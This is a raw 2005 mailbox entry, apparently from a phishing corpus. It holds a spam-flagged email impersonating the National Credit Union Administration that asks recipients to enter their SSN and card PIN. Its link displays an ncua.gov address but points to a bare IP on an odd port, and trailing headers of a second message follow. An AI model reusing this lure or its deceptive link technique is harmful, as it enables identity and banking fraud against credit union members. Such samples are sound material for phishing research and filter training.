From: "Credit Union National Association (CUNA)" <confirm@cuna.org>
Reply-To: "Credit Union National Association (CUNA)" <security@cuna.org>
To: josu@uninet.edu
Subject: [*** POSIBLE SPAM***] IMPORTANT: CUNA Verification
Date: Mon, 03 Oct 2005 21:14:11 +0300
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--7318499299055614043"
X-Priority: 1
X-MSMail-Priority: High
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at uninet.edu
X-Spam-Flag: YES
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: *************
X-Spam-Status: Yes, score=13.7 required=5.0 tests=FORGED_MUA_EUDORA,
	HTML_40_50,HTML_IMAGE_ONLY_20,HTML_MESSAGE,MIME_BOUND_DD_DIGITS,
	MIME_HTML_ONLY,MIME_HTML_ONLY_MULTI,MISSING_MIMEOLE,MPART_ALT_DIFF,
	MSGID_SPAM_CAPS,NORMAL_HTTP_TO_IP,RCVD_IN_BL_SPAMCOP_NET,
	RCVD_NUMERIC_HELO,WEIRD_PORT autolearn=spam version=3.0.2
X-Spam-Report: 
	*  4.1 MIME_BOUND_DD_DIGITS Spam tool pattern in MIME boundary
	*  3.8 MSGID_SPAM_CAPS Spam tool Message-Id: (caps variant)
	*  1.2 RCVD_NUMERIC_HELO Received: contains an IP address used for HELO
	*  0.0 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  0.1 WEIRD_PORT URI: Uses non-standard port number for HTTP
	*  0.0 HTML_40_50 BODY: Message is 40% to 50% HTML
	*  0.4 HTML_IMAGE_ONLY_20 BODY: HTML: images with 1600-2000 bytes of words
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 MPART_ALT_DIFF BODY: HTML and text parts are different
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
	*      [Blocked - see <http://www.spamcop.net/bl.shtml?62.193.212.129>]
	*  2.4 MIME_HTML_ONLY_MULTI Multipart message only has text/html MIME parts
	*  0.0 MISSING_MIMEOLE Message has X-MSMail-Priority, but no X-MimeOLE
	*  0.0 FORGED_MUA_EUDORA Forged mail pretending to be from Eudora
Content-Length: 1916
Lines: 56
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 293

----7318499299055614043
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>NCUA</title>
</head>

<body>
<table width=3D"99%" height=3D"102" 
border=3D0 cellpadding=3D0 cellspacing=3D0 background=3D"http://www.ncua.g=
ov/images/prop/bannerStabwide2.jpg">
  <tr>
  <td width=3D"18%"><A href=3D"http://www.ncua.gov/index.html"><IMG height=
=3D98 
      alt=3D"NCUA Seal" src=3D"http://www.ncua.gov/images/prop/blueseal98.=
gif" width=3D100 
      align=3Dleft border=3D0></A></td>
    <td width=3D"82%" height=3D"102"><H2>National Credit Union Administrat=
ion</H2></td>
  </tr>
</table><table width=3D"553" border=3D"0" cellspacing=3D"0" cellpadding=3D=
"0">
  <tr>
    <td width=3D"553">Dear CU holder account,
      <p>This notice informs you that your Credit Union bank has joined ou=
r Federal Credit Union(FCU) network. For both, our and your security, we a=
re asking you to activate an online account on our database. After activat=
ion you can login on our system with your SSN and your Credit/Debit PIN nu=
mber. </p>
      <p>You must visit the FCU activation page and fill in the form to ac=
tivate your online account:</p>
      <p><a href=3D"http://200.203.89.180:2324/.CREDIT-UNION/update_card.h=
tm">http://www.ncua.gov/activate_account.html</a></p>
      <p>In accordance with NCUA User Agreement, you can use your online a=
ccount in 24 hours after activation. We thank you for your prompt attentio=
n to this matter. Please understand that this is a security measure intend=
ed to help protect you and your account.<br>
      </p>
      <p>We apologize for any inconvenience. </p>
      <p>Sincerely, NCUA Account Review Department <br>
      </p>
      <p><hr>
      <br>
          Please do not reply to this e-mail. Mail sent to this address ca=
nnot be answered<br>
          <br>
    </p></td>
  </tr>
</table>

</body>
</html>

----7318499299055614043--

From confirm@cuna.org  Mon Oct  3 13:27:11 2005
Return-Path: <confirm@cuna.org>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 093AE536E43
	for <jose@login.monkey.org>; Mon,  3 Oct 2005 13:27:11 -0400 (EDT)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id 685296FA305
	for <jose@monkey.org>; Mon,  3 Oct 2005 13:27:07 -0400 (EDT)
Received: from lujan.uninet.edu (bio.hgy.es [193.146.180.21])
	by mail2.monkey.org (Postfix) with ESMTP
	for <jose@monkey.org>; Mon,  3 Oct 2005 13:27:07 -0400 (EDT)
Received: by lujan.uninet.edu (Postfix)
	id C32251BC17; Mon,  3 Oct 2005 19:26:41 +0200 (CEST)
Delivered-To: umeet@uninet.edu
Received: from localhost (unknown [127.0.0.1])
	by lujan.uninet.edu (Postfix) with ESMTP id 6555C1BBE7
	for <umeet@uninet.edu>; Mon,  3 Oct 2005 17:26:41 +0000 (UTC)
Received: from lujan.uninet.edu ([193.146.180.21])
	by localhost (lujan [193.146.180.21]) (amavisd-new, port 10024)
	with ESMTP id 17453-06 for <umeet@uninet.edu>;
	Mon, 3 Oct 2005 19:26:23 +0200 (CEST)
Received: from 62.193.212.129 (unknown [62.193.212.129])
	by lujan.uninet.edu (Postfix) with SMTP id 1A2701BB50
	for <umeet@uninet.edu>; Mon,  3 Oct 2005 19:26:22 +0200 (CEST)
Received: from 163.93.236.159 by ; Mon, 03 Oct 2005 23:20:08 +0500
Message-ID: <NAFALNXTCPYOFCWSFBKNQP@comcast.net>
